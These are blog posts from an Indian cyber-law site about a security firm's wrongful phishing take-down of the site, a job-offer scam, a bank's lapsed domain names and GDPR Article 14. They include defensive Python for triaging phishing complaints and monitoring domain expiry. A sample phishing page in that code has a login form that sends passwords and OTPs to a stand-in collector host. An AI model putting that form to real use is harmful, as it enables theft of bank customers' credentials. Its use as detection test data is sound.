RSA.COM remains silent

In continuation of the report of the incident of illegal blocking of Naavi.org on 17th January 2021, I would like to inform the readers of Naavi.org that Union Bank of India has expressed regrets for the incident. A senior executive of the Bank called yesterday evening to express his regrets on behalf of the Bank.

However, so far there has been no response from RSA.COM.

I have therefore raised a complaint with CERT-In today as follows:

Quote:

To

The Director General
CERT-IN
Delhi
Subject: Complaint against RSA.COM, wherever they are located
I write to report an incident of security breach caused by RSA.COM and request you to investigate the same and take action under Section 70(B) of ITA 2000.
The details of the incident are reported at https://www.naavi.org/wp/union-bank-and-rsa-fiasco/
It is understood that Union Bank of India, an Indian public sector Bank has engaged the services of RSA.COM for certain cyber security related services, under terms of contract which are not known.
However, on 15th January 2021, RSA.COM caused the website www.naavi.org to be interrupted through a false accusation and notice sent to M/s Square Brothers Info Tech (P) Ltd (squarebrothers.com), which is the hosting company for naavi.org. As has been explained in the article which was accused of containing a phishing link, I had alerted Union Bank that if they do not take corrective action, the erstwhile Internet banking URLs of the merged banks could be used for phishing. This was the sort of alert which normally should be given by CERT-In.
In the notice sent to the service provider, RSA.COM however made unsubstantiated and defamatory statements about the website www.naavi.org, which has an impeccable history of over 20 years as the custodian of Netizens' interest in India. The take-down demand accused the website www.naavi.org of being “Fraudulent”, “Fake” and “Hosting a phishing link”. The notice was so drafted as to create panic in the minds of the service provider and force them to take down the website.
I however record that after my complaint, the service provider (Squarebrothers.com) restored the service quickly.
However, the action of RSA.COM needs to be investigated and necessary counter action has to be taken by CERT-In to prevent recurrence of such events to other website owners in India.
The action of RSA.COM was arbitrary and caused a “Denial of Service” under Section 43(f) of ITA 2000 and an offence under Section 66.
Further, the notice sent by RSA to my service provider was a violation of Section 69 of ITA 2000 since it did not follow the due process indicated there in.
As the owner of the website www.naavi.org, I demand that action be taken against RSA.COM under the powers available with CERT-In under section 70(B) of ITA 2000.
In particular, I would like to know
1. Why are Indian Banks allowed to obtain services from such foreign agencies which involve sharing of sensitive personal information of Banks? Does it not violate the Data Localization requirement of RBI?
2. Does RSA.COM have any accreditation with CERT-In as a reliable security agency?
3. Do they have a system to analyze a phishing complaint before they issue take-down orders on service providers?
4. Are they authorized to issue such “Orders” as per the decision of the Supreme Court of India in the Shreya Singhal case?
5. Have they reported this as an “Incident” to either RBI or to you?
6. Does the contract between Union Bank of India and RSA.COM incorporate any indemnity clause to protect the Bank against legal action arising out of such reckless action by RSA.COM, since their action exposes Union Bank to legal liabilities?
7. Does the contract between Union Bank of India and RSA.COM provide for jurisdiction of Indian Courts and application of laws in India?
8. You can observe from the notice of RSA.COM that they are demanding certain data arising out of the incident. Under what law are they entitled to the data even if it has been collected through phishing?
I request CERT-In to issue a circular to all service providers in general that
a) Companies like RSA.COM do not have any authority to issue demands for take-down of any web service, and such requests should be considered valid only if it is a “Verified” order from a “Competent Court in India”; nor do they have any right to ask for customer data to be shared.
b) Service providers receiving such requests should be guided by a policy for addressing such take-down requests, which should normally come from the Courts or, in an emergency, from CERT-In. Private companies should in no circumstance be allowed to exercise judicial powers in the manner RSA.COM has done in this instance.
c) The policy (“Take down of services Policy” ) should ensure that the service provider should check if the allegation is true and ensure that a show cause notice is issued to the owner of the web asset which is sought to be removed before taking further action.
d) In all such cases a report should be shared with CERT-In.
In the instant case, I have received an expression of regret from Union Bank of India and profuse apologies from the service provider, who also restored the service quickly. However, so far no response has come from RSA.COM.
CERT-In failed to intervene when Net4India customers were denied access through a wrong order from the NCLT. I wish CERT-In will not fail again to act in this case against RSA.COM.
I hope to receive a confirmation of the action taken. The Indian security community will be eagerly looking forward to the response from your end.
Naavi
(Na.Vijayashankar)

Unquote

I am looking forward to the action to be taken by CERT-In.

Naavi

Posted in Cyber Law | Leave a comment

Union Bank and RSA Fiasco

Today, I woke up in the morning to see the following email from my hosting service provider

The email suggested that a phishing script had been hosted at www.naavi.org in its article on Union Bank published on January 14, 2021 (second article) and that a complaint had been received from RSA Security. The service provider had disabled not only the article page but the entire website www.naavi.org.

Old followers of Naavi.org are aware that, a long time back, one of the articles of Naavi published on a blog site (www.bloggernews.net) had been blocked, which attracted a wide discussion on “Censorship” by the Government. That was in connection with an article on the Zone-H.org website on which some comments had been made by the owner of Zone-H.org which were found unpalatable by a company in Hyderabad, and the MeitY had blocked the article and the entire blog site as a mistaken implementation of a “Contempt of Delhi High Court order”. It indicated that MeitY (it was DIT at that time) had not applied its mind in issuing the blocking order. Subsequently the blockade was removed. Even before this, Naavi had also taken up another case when MeitY had blocked the entire Yahoo Groups in order to block one group in Manipur.

Now a similar incident has arisen, with RSA sending a notice this morning to my service provider Squarebrothers.com, a Chennai-based hosting and internet service provider with whom I have had a nearly 25-year relationship.

The RSA notice, a copy of which is given below, made some accusations which need to be restated here.

RSA in its message sent to Square Brothers, stated

“RSA has been made aware that you appear to be providing Internet Services to a site, which is abusing Union Bank of India’s brand. This site hxxps://www[.]naavi[.]org/wp/union-bank-of-india-should-learn-to-protect-its-digital-assets/ not only violates Union Bank of India’s copyright, trade marks and other intellectual property rights, but may also become a host to a phishing attack, or other fraudulent scams against Union Bank of India and its clients.”

It went ahead and branded naavi.org as a fraudulent website stating

“The fraudulent website not only represents a misuse of Union Bank of India’s intellectual property; its purpose is to mislead the Union Bank of India clients. Our experience has shown that such sites become a host of phishing** and other fraudulent scams against the bank clients.”

RSA then directed Square brothers

“Please take all necessary steps to immediately shut down the fraudulent website, terminate its availability to the Internet and discontinue the transmission of any e-mails associated with this website. We understand that you may not be aware of this improper use of your services and we appreciate your cooperation.”

I would like to state that the RSA Security team which drafted this message must be some kids who do not know that Naavi.org is a website which for over 22 years has been providing services for fighting Cyber Crimes and Phishing.

The message started with the words

“RSA, an anti-fraud and security company, is under contract to assist Union Bank of India in preventing or terminating online activity that targets, or may potentially target Union Bank of India’s clients as potential fraud victims.”

The trigger for this development was the article in which I pointed out that Union Bank, which took over Corporation Bank and Andhra Bank, had abandoned the earlier domain names of the two Banks. By doing so, and by deciding not to invest Rs 800/- per year per domain to protect the digital asset, they would be losing the traffic to the website, which would continue for a long time. This is the valuation aspect I have discussed in detail in the said article.

More than this exploitation of the traffic, I was concerned that the domain names would soon be registered by fraudsters who would be committing phishing frauds on the erstwhile customers of these two Banks.

My intention was to warn Union Bank that any such phishing would result in a liability on Union Bank. I was also highlighting the need for valuation of digital assets and bringing it into the books of account.

It is unfortunate that neither Union Bank nor the RSA team has read the article and understood what it contained. Instead, RSA jumped to the conclusion that Naavi.org itself was a phishing site. By doing so, they exhibited their utter inefficiency in protecting Union Bank's interests. Instead of shooting the thief, they were shooting at the guard.

By their action, RSA caused “Denial of Access” as far as Naavi.org was concerned, which is an offence under Section 66 of ITA 2000.

According to ITA 2000, Section 69, the Government has the power to block websites, for which there is a process, and the authority remains with the Home Secretary. Any other person blocking a website would be committing an unauthorised act which is punishable under Section 66 of ITA 2000. Civil liabilities can also be claimed under Section 43 of the Act. The Supreme Court judgement in the Shreya Singhal case has also reiterated that intermediaries under Section 79(3) can only delete content on the basis of a Court order.

However, RSA arrogated to itself a judicial verdict that naavi.org was a “Fraudulent website” which is a defamatory statement. This was contrary to the Supreme Court verdict in the Shreya Singhal case.

Unfortunately, the service provider, in this case M/s Square Brothers, acted on the illegal notice from RSA and took down the website.

(Immediately after I pointed out the mistake to them, Square Brothers not only re-instated the site but also called me up to apologize.)

In such cases it is necessary for service providers to raise a ticket, call for the views of the accused and then take a decision. Naavi.org has given an earlier suggestion on how to handle “Rogue Websites” which could be adopted into the Incident Management System and the Grievance Handling mechanism of intermediaries.
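The verification step suggested above can be made concrete. The following is an added example, not code from the original article and not anything RSA or Square Brothers use: a hosting provider that receives a phishing complaint fetches the accused URL itself and checks for the technical indicators of a phishing page (a form collecting credentials, especially one posting them to another host, and a hostname imitating the complainant's brand label). A page that merely mentions the brand produces no indicator, so the output is a show-cause notice to the owner rather than a take-down, and any suspension is scoped to the single URL, not the whole site. The two HTML pages, the lookalike host `corpbank-netbanking.example` and the collector host are constructed sample data.

```python
"""Triage a third-party phishing/take-down complaint before acting on it.

Added example; the sample pages and hostnames below are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field names that indicate a form is harvesting credentials or card data.
CREDENTIAL_FIELDS = ("password", "passwd", "pin", "otp", "cvv", "cardno", "card_number")


class _FormScanner(HTMLParser):
    """Collects every <form>, its action URL and the (type, name) of its inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""), "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(
                (a.get("type", "text").lower(), a.get("name", "").lower()))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def assess_phishing_allegation(page_url, html, brand_domains):
    """Return the indicators found on the accused page and the action they justify."""
    hosted = (urlparse(page_url).hostname or "").lower()
    indicators = []

    # 1. Brand-lookalike hostname: contains a brand label but is not the brand's own domain.
    brand_labels = {d.split(".")[0] for d in brand_domains}
    if hosted not in brand_domains:
        for label in sorted(brand_labels):
            if label in hosted:
                indicators.append(f"hostname {hosted} imitates brand label '{label}'")

    # 2. Credential-harvesting forms, and where they send the data.
    scanner = _FormScanner()
    scanner.feed(html)
    for form in scanner.forms:
        types = {t for t, _ in form["inputs"]}
        names = {n for _, n in form["inputs"]}
        collects_credentials = "password" in types or any(
            key in name for name in names for key in CREDENTIAL_FIELDS)
        if not collects_credentials:
            continue
        indicators.append(f"form collects credentials (fields: {sorted(names)})")
        target = (urlparse(form["action"]).hostname or hosted).lower()
        if target != hosted:
            indicators.append(f"credential form posts off-site to {target}")

    if indicators:
        action = ("credential-harvesting indicators present: suspend this URL only, "
                  "notify the site owner, and preserve logs for the complainant's report")
        suspend_url = page_url
    else:
        action = ("no technical evidence of phishing: do not suspend; forward the "
                  "complaint to the site owner with a show-cause notice and ask the "
                  "complainant to substantiate the allegation")
        suspend_url = None
    return {"indicators": indicators, "suspend_url": suspend_url, "recommended_action": action}


# Constructed sample inputs (hypothetical HTML, not the real pages).
BRAND_DOMAINS = {"corpbank.com", "andhrabank.com"}

ARTICLE_URL = "https://www.naavi.org/wp/union-bank-of-india-should-learn-to-protect-its-digital-assets/"
ARTICLE_HTML = """<html><body>
<h1>Union Bank of India should learn to protect its Digital Assets</h1>
<p>corpbank.com and andhrabank.com have lapsed and could be used for phishing
against the erstwhile customers of Corporation Bank and Andhra Bank.</p>
<form action="/wp/search"><input type="text" name="q"></form>
</body></html>"""

PHISH_URL = "https://corpbank-netbanking.example/login"  # hypothetical lookalike host
PHISH_HTML = """<html><body>
<img src="corpbank-logo.png"><h2>Corporation Bank NetBanking - Re-activate your account</h2>
<form action="https://collector.example/grab" method="post">
  <input type="text" name="userid"><input type="password" name="password">
  <input type="text" name="otp"><input type="submit" value="Login">
</form></body></html>"""

if __name__ == "__main__":
    for url, page in ((ARTICLE_URL, ARTICLE_HTML), (PHISH_URL, PHISH_HTML)):
        verdict = assess_phishing_allegation(url, page, BRAND_DOMAINS)
        print(url, "\n ", verdict["recommended_action"])
        for ind in verdict["indicators"]:
            print("   -", ind)
```

Run stand-alone, the article page yields no indicators and a show-cause recommendation, while the constructed lookalike page yields three indicators (brand label in hostname, a password/OTP form, and an off-site post target) and a suspension scoped to that one URL. The checks are deliberately simple; the point is that the provider gathers evidence and hears the owner before acting, rather than executing a complainant's notice.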

I presume that after I wrote the article on Union Bank, it would rightly have attracted the attention of the CISO at Union Bank of India, who would have, again without fully understanding what I wanted Union Bank to do in the instance, forwarded a mail to the RSA Security team saying perhaps… “Please respond”.

The idiotic knee-jerk response from RSA was to declare that Naavi.org was a fraudulent site hosting a phishing script, and to ask Square Brothers to block the site, also directing them:

“We specifically would ask that you also take the following actions (if relevant or possible):

* Please provide us with a tar/zip file of the source code for this site, so that we may analyze it to help prevent further attacks.
* If any customer data has been captured that is stored on your systems or equipment, please send us that data so that the customers to whom that data relates can be notified and take steps to protect their credit.
* Please provide a copy of any records you maintain that indicate the name, contact information, method of payment or similar information that may be useful in helping learn the identity and location of the customer for whom the website has been operated.

Thank you for your cooperation to prevent and terminate this fraudulent activity.”

The RSA communication was signed by:
Anti-Fraud Command Center
RSA Security, LLC.
UK Phone: +44-800-032-7751
US Phone: +1-866-408-7525
CA Phone: +1-800-406-8651
E-mail: afcc@rsa.com
www.rsa.com

The footnote to the RSA letter stated

“**”Phishing” is an e-mail scam that attempts to trick consumers into revealing personal information-such as their credit or debit account numbers, checking account information, Social Security numbers, or banking account passwords-through fake Web sites or in a reply e-mail. As described in the letter above, the fake web-site through which the fraudster is attempting to collect Union Bank of India’s customer data is under your responsibility.”

I wanted RSA to let me know where the “Fake Website” is, where the “Phishing Script” in Naavi.org is, and how Naavi.org becomes a “Fraudulent Website”.

On the other hand, I can call RSA a fake security services provider who cannot be trusted by the Bank. By their current action, they exposed both Union Bank and Square Brothers to legal action for defamation and the violation of several sections of ITA 2000. Having a security agency which does not know its legal obligations is a risk for Union Bank, and I request Union Bank to revise its contract.

In case RSA has identified this as a “Phishing Incident”, I want to know if they have notified CERT-In and RBI about the potential security breach. If not, is it not another failure of their security service?

I also request RBI to examine this incident and advise banks not to appoint blind and uninformed security agencies, even if they carry the tag of “RSA”, if the persons managing the “Command Center” do not know the difference between “Phishing” and “Reporting a Phishing possibility”. Most of RSA's work is what they may call “Ethical Hacking” while we can call it “Potential Black hat hacking”. Such an agency passing its views on Naavi.org is like the devil calling an angel a fake.

I sent out a detailed e-mail to all the concerned persons this morning, immediately after which I got the response from Square Brothers. But neither RSA nor Union Bank has come out with an apology for their unwarranted reactions and comments.

I look forward to them realizing that when they receive such complaints, they cannot let their robots take “Automated decisions” and launch an attack on a genuine website.

There has to be human intervention to check if the robotic response was correct. Surrendering to Artificial Intelligence and automated responses is idiotic, to put it mildly. Indian law under Section 11 of ITA 2000 attributes such responses to the owners, and they can be held liable.

If Section 85 is applied, the head of RSA and the Chairman of Union Bank as well as several other officials in the Bank and RSA are liable to be prosecuted for this action.

I hope that Union Bank realizes the extent of the risk into which they have been pushed by the injudicious action of their security advisors, namely RSA.

Comments are welcome

Naavi

Reference: E-mail sent to various parties in Union Bank, RSA, Square Brothers, MeitY

P.S.: At the end of the day, Union Bank called to express regrets. Hopefully the Bank will enquire how RSA was prompted to issue a “Take down order” without verification of the content and expose the Bank and its executives to criminal liability. The Bank has to put in place a system for handling complaints. The Bank can review the contract with RSA to incorporate a penalty clause to ensure that RSA is responsible for such actions. This is a case study in how a Techno Legal incident needs to be recognized and responded to. RSA needs to review its service if it is to remain credible as a security provider for Banks.

I thank a number of my friends who responded with suggestions during this incident. One of them pointed out that RSA has been using a similar notice for such incidents for the last 10 years, by sending me a copy of one such notice. This indicates that RSA is really not aware of its legal position and whether it needs to make changes to its system. I am waiting for RSA to respond. Otherwise a complaint may have to be filed against RSA some time today.

Naavi

18.01.2021


Journalist Nidhi Razdan duped

In a classic web-based fraud, NDTV journalist Ms Nidhi Razdan appears to have fallen prey to an Internet scam in which she was offered a position of “Associate Professor of Journalism”, which prompted her to resign from her job at NDTV. Subsequently she realized that the offer was not genuine.

This sort of fraud has been reported earlier also. In a typical case, the victim would receive forged appointment orders on the proper letterhead of a well-known organization; there would even be a phone number for contact which would confirm the transaction if called. The fraudsters would go through a simulation of all the publicly known procedures that the organization normally adopts for such recruitment. Even the work permit and visa would be forged and delivered.

While providing all these preliminary services, the fraudster would collect money. In one of the cases I had come across earlier, a senior corporate employee getting about Rs 3 lakhs salary per month in India opted to take a better offer from London. After resigning from the job and getting ready to move with his family to London, the person realized the fraud. By that time he had spent more than Rs 3 lakhs.

In the instant case, Nidhi Razdan has not revealed the financial loss she has suffered, probably to keep the information confidential for reasons of privacy. But it is reasonable to expect that she would have suffered a loss of at least around Rs 5 lakhs. The financial trail of these payments is the best available means of tracking the fraud. I presume that the money can be recovered if properly followed up.

What is however important for the public to realize is that the fraudsters are so smart and sophisticated that even a well-informed person like Nidhi Razdan, with several personal contacts abroad who could have helped her check the genuineness of the offer, fell prey to the fraud. We should welcome the public awareness being created by this incident, and several senior executives seeking a job change would benefit from the knowledge they gain through this exposure.

Frauds of this kind are facilitated by the natural psychological approach of most such senior professionals: initially they keep the offer confidential and deal with it entirely on their own. If they are financially independent, they would not even inform others within the family before the loss starts hurting them. They would not share the information with their friends and colleagues because they would like to avoid problems in the current workplace as long as possible. Thus, until they are forced to submit their resignation, the information would be guarded as a secret.

In the meantime, the fraudster would take fees for verification of documents, arranging the visa and work permit, etc. The victim would have shared his/her passport and identity details, which are sometimes separately used to get fake identity documents by terrorists and other fraudsters abroad without the knowledge of the victim.

We do not know if any OTP for a Bank transaction was also obtained and a large amount of money siphoned off from the Bank.

I wish this will be a lesson for all job seekers to be careful whenever an “upfront” payment is involved in such transactions.

Our sympathies are with the victim, and our appreciation for sharing the details with the public, which would be useful for others.

Naavi


Union Bank of India should learn to protect its Digital Assets

[In continuation of the previous Article]

Naavi has been advocating that Digital Assets need to be accounted for in the balance sheets of their owners. Today it is only under the Personal Data Protection Standard of India, or PDPSI, that a recommendation has been made to companies to bring their digital assets into the books of account.

By not accounting for digital assets in the books of account, we have seen that NCLT declared Net4India bankrupt without recognizing the value of around 3 lakh sticky customers. In many web business takeovers, mere “Eye Balls” (namely the number of average visitors to a website) have been valued at over $200/- each (read this old article in Fortune).

When Union Bank of India took over Corporation Bank and Andhra Bank, it inherited two websites namely www.corpbank.com and www.andhrabank.com.

Two years back, www.corpbank.com was valued at $503,200 (Rs 35 crores) (see here). According to another estimate it was worth $52,000/- (Rs 36 lakhs). The exact value may not be relevant, but the fact that it had a substantial value is not in doubt. Will any prudent company throw away assets worth Rs 36 lakhs or Rs 35 crores when maintaining this asset ownership would have cost only around Rs 800/- per year?

Unfortunately, Union Bank of India has done just that. They have thrown away this asset without understanding its value. Similarly, www.andhrabank.com also had a value, maybe to a lesser extent.

After the merger, Union Bank of India has not renewed the domain names corpbank.com and andhrabank.com. As a result, the two domain names have now been registered in the name of net4solutions and godaddy respectively.

Very shortly these domain names will be bought by phishing scammers who will host websites confusingly similar to those of Corporation Bank and Andhra Bank and successfully cheat the erstwhile customers of these Banks, whose accounts will now be with Union Bank.
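The lapse described above is detectable long before a squatter or scammer takes the name. The following is an added example, not code from the original article or from any bank: a portfolio check that a merged bank's security team could run against registration data for every domain inherited from the merged entities, flagging names that have already passed to someone else (to be recovered by notice, buy-back or dispute) and names still held but near or past expiry (to be renewed). The records are constructed sample data in a simplified registration-record shape; the registrant names and dates are illustrative, the `.example` domains are hypothetical, and the check assumes the bank knows the names under which it legitimately registers domains.

```python
"""Monitor a merged bank's domain portfolio for lapse and ownership drift.

Added example; the records below are constructed, not live registry data.
"""
from datetime import date

# Names under which the bank (and the banks merged into it) legitimately holds domains.
OWNER_NAMES = ("union bank of india", "corporation bank", "andhra bank")


def classify_domain(record, today, warn_days=60, owner_names=OWNER_NAMES):
    """Return (status, detail) for one registration record.

    LOST      registrant is not one of the bank's names: the domain has passed
              to someone else and must be recovered (notice / buy-back / dispute).
    EXPIRED   still in the bank's name but past expiry: renew before the
              registrar's grace or redemption window closes.
    EXPIRING  in the bank's name and expiring within warn_days: renew now.
    OK        owned and not due.
    """
    registrant = record["registrant"].lower()
    expiry = date.fromisoformat(record["expiry"])
    if not any(name in registrant for name in owner_names):
        return "LOST", f"registered to '{record['registrant']}', not the bank"
    days_left = (expiry - today).days
    if days_left < 0:
        return "EXPIRED", f"expired {-days_left} days ago"
    if days_left <= warn_days:
        return "EXPIRING", f"{days_left} days to expiry ({expiry.isoformat()})"
    return "OK", f"{days_left} days to expiry"


def portfolio_report(records, today, warn_days=60):
    """Map each domain to its (status, detail)."""
    return {r["domain"]: classify_domain(r, today, warn_days) for r in records}


def alerts(records, today, warn_days=60):
    """Domains needing action as (domain, status, detail), worst first."""
    order = {"LOST": 0, "EXPIRED": 1, "EXPIRING": 2}
    report = portfolio_report(records, today, warn_days)
    return sorted(((d, s, why) for d, (s, why) in report.items() if s != "OK"),
                  key=lambda item: order[item[1]])


# Constructed sample records (not real registry data; .example names are hypothetical).
SAMPLE_RECORDS = [
    {"domain": "corpbank.com",   "registrant": "Net4 Solutions", "expiry": "2022-01-05"},
    {"domain": "andhrabank.com", "registrant": "GoDaddy",        "expiry": "2021-12-20"},
    {"domain": "andhrabank-old.example",    "registrant": "Andhra Bank",         "expiry": "2020-12-31"},
    {"domain": "unionbank-legacy.example",  "registrant": "Union Bank of India", "expiry": "2021-02-15"},
    {"domain": "unionbank-main.example",    "registrant": "Union Bank of India", "expiry": "2023-06-30"},
]
TODAY = date(2021, 1, 14)  # the date of the article this example accompanies

if __name__ == "__main__":
    for domain, status, why in alerts(SAMPLE_RECORDS, TODAY):
        print(f"{status:9} {domain:28} {why}")
```

Run against the sample data on 14 January 2021, the two lapsed names come out as LOST, the hypothetical `andhrabank-old.example` as EXPIRED (14 days ago, inside a typical grace window), `unionbank-legacy.example` as EXPIRING (32 days left) and the main domain as OK. In practice the records would be refreshed from the registrars or RDAP on a schedule, and a LOST result for a name that is still printed on cheque books and passbooks should be treated as an open phishing risk, not a closed asset.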

At that time, a valid argument of the customers would be that Union Bank of India, by its ignorance and negligence, failed to hold on to the valuable trade mark asset of the merged banks and facilitated the phishing fraud.

The possibility of Union Bank of India failing to take note of the digital asset called domain names would have been less if the balance sheet of Corporation Bank had shown the value of this domain name, even at say Rs 1 if not Rs 36 lakhs or Rs 35 crores. Even if it had been shown as a contra entry on both the asset and liability sides at say Rs 36 lakhs, the value would have remained visible.

This is the point we made in the case of Net4India.com, which NCLT declared “Bankrupt” when there was a hidden customer value of around 3 lakh × 200 US dollars, equal to around 6 crore US dollars or Rs 420 crores.

This valuation would be available if the concern is valued as a “Going Concern” and the value is preserved during events such as a merger or pre-insolvency evaluation. Once this is ignored, the company will revert to a “Gone Concern” status and the value will drop to zero.

I would like ICAI to consider this and develop a methodology to bring valuation of digital assets (domain names and other assets such as personal data and non personal data) into the balance sheets.

I hereby request RBI to take note of how Union Bank has not only wasted the value of the assets taken over but will also be exposing its customers to a high phishing risk, the liabilities for which would have to be borne by Union Bank of India.

The Board of Union Bank of India should also check how they can at least re-own the two domain names, because there is a “Trade Mark” value associated with them which was passed on to Union Bank due to the merger.

The first thing Union Bank has to do is to serve a notice on the two registrars and restrain them from selling the domain names to any third party. Later, they can file a buy-back request and, if the registrars quote an unreasonable price, the Bank should file a domain name dispute and recover the domain names immediately.

In the past, Canara Bank had a similar issue when Canarabank.com had been squatted by another person, and the Bank, without recovering the domain name, simply adopted Canbak.com and continued the business. After this was pointed out by the undersigned, the Bank got back the domain name through the domain name dispute process.

I am personally concerned with the Corpbank.com issue since I was personally responsible for the purchase of this domain name by Corporation Bank, creating the content for the Bank's first website and hosting it at the time they went public way back in 1997. I am also a continuing customer of Corporation Bank who has become a customer of Union Bank of India because of the merger. It is therefore sad if Union Bank does not manage its digital assets and the name corpbank.com (as well as andhrabank.com) is used by fraudsters to cheat the erstwhile customers of Corporation Bank who continue as customers of Union Bank of India.

Naavi


Union Bank of India will be facilitating Phishing by Ignorance and Negligence

Union Bank of India is considered one of the better managed banks in India, and RBI recently merged Corporation Bank and Andhra Bank with Union Bank. Both the merged Banks had decades of history and brand name amongst their customers.

However, Union Bank seems to be completely unaware of the banking risks in the digital era, or it is so poor as not to be able to invest around Rs 800/- on behalf of each of the merged Banks to protect the interests of the customers of these Banks.

I wish the Chairman of Union Bank of India looks at why I am forced to make the statement that “Union Bank of India will be facilitating Phishing by Ignorance and Negligence”.

(Continued)

Naavi


Using publicly available data under GDPR

Many organizations involved in market research collect data from publicly available sources such as Google searches, social media postings, etc. This information is processed and some useful market information is gathered. This may also be commercially traded as market research reports.

The recent discussions on whether WhatsApp can share some of its information internally with Facebook, and whether Facebook can use it for advertising profiling of users, have re-kindled the debate on how data protection laws need to address publicly available information.

The regulatory authorities can take the easy way out and stick to the exact wording of Article 14 of GDPR: where personal data have not been obtained from the data subject, the controller shall provide the data subject with certain information about the collection, the purpose, etc., within a reasonable period not exceeding one month.

There is also a proviso that this obligation shall not apply where and in so far as

(a) the data subject already has the information;
(b) the provision of such information proves impossible or would involve a disproportionate effort, in particular for processing for archiving purposes in the public interest, scientific or historical research purposes or statistical purposes, subject to the conditions and safeguards referred to in Article 89(1) or in so far as the obligation referred to in paragraph 1 of this Article is likely to render impossible or seriously impair the achievement of the objectives of that processing. In such cases the controller shall take appropriate measures to protect the data subject’s rights and freedoms and legitimate interests, including making the information publicly available;
(c) obtaining or disclosure is expressly laid down by Union or Member State law to which the controller is subject and which provides appropriate measures to protect the data subject’s legitimate interests; or
(d) where the personal data must remain confidential subject to an obligation of professional secrecy regulated by Union or Member State law, including a statutory obligation of secrecy.

In the context of the above we can re-visit the decision of the Polish supervisory authority imposing a fine of Euro 220K on a company by the name of Bisnode.

The Company had a total of 7.5 million data records (personal and proprietary business data) and the supervisory authority expected that all of the data subjects be duly notified as required. The Company represented that it would have to incur a cost of around Euro 8-9 million if proper notices were to be sent, which was disproportionate to the cause. There was no issue regarding the quality of the security measures otherwise adopted by the company to secure the data.

This incident raises some specific issues which require a deeper debate.

Are the GDPR authorities interested in closing down all businesses which are into market research based on public information?

Is it not fair to consider that Data Protection is essentially about giving control to the data subject over what information he wants to keep unshared and what information he wants to share? If the data subject wanted the social media information not to be shared, would it not have been possible for him to set the privacy settings on his posts to “Visible only to approved Contacts” rather than leaving them open for a search engine to parse?

If a data subject has taken a decision not to enforce his privacy settings, is it not correct to consider that there is a “Deemed Consent” that the data can be used for purposes consistent with the disclosure, as long as no adverse impact on the privacy of the person is envisaged in the processing?

In most cases the data may be used for statistical analysis, and only some of the data subjects may need to be contacted for further use of the data, such as sending a marketing message. Whether, in such cases, a consent request only to the data subjects short-listed for further communication would be sufficient is to be explored.

Also, as in the case of WhatsApp obtaining the consent of the data subject to share the data with Facebook and Facebook using it on the basis of the consent obtained by WhatsApp, would it be possible for a social media platform like Twitter to obtain a general consent which includes something similar to the following:

“In case the user does not restrict the visibility of the data through privacy setting, the data may be shared with search engines and research agencies subject to no automated decision making on the data subject or direct contact with marketing messages”… etc.

It is time that experts make representations to the EDPB for a suitable relaxation in the interpretation of Article 14 to include the legitimate interest of market research agencies.

Until such time, those companies which are directly liable under GDPR as “Data Controllers” need to prepare a DPIA and file it for prior consultation. If the company is a “Data Processor” then it may depend on the Data Controller to take the responsibility.

In case the data processing is outside GDPR, then there is no need to worry about Article 14 of GDPR; companies should follow the principles enunciated in the Personal Data Protection Standard of India (PDPSI) for this purpose.

The above is towards development of Jurisprudence regarding data protection.

Comments are welcome.

Naavi
